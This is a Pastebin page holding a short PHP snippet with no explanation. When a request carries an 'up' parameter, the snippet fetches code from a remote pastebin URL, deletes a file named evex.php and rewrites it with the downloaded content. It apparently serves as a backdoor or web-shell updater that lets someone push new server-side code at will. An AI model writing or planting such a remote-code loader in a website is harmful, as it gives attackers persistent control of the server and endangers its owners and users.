Advertisement
Guest User

Untitled

a guest
Jun 30th, 2015
215
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. if(array_keys($_GET)[0] == 'up'){
  2. $content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
  3. if($content){unlink('evex.php');
  4. $fh2 = fopen("evex.php", 'a');
  5. fwrite($fh2,$content);
  6. fclose($fh2);
  7. }}else{print "test";}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement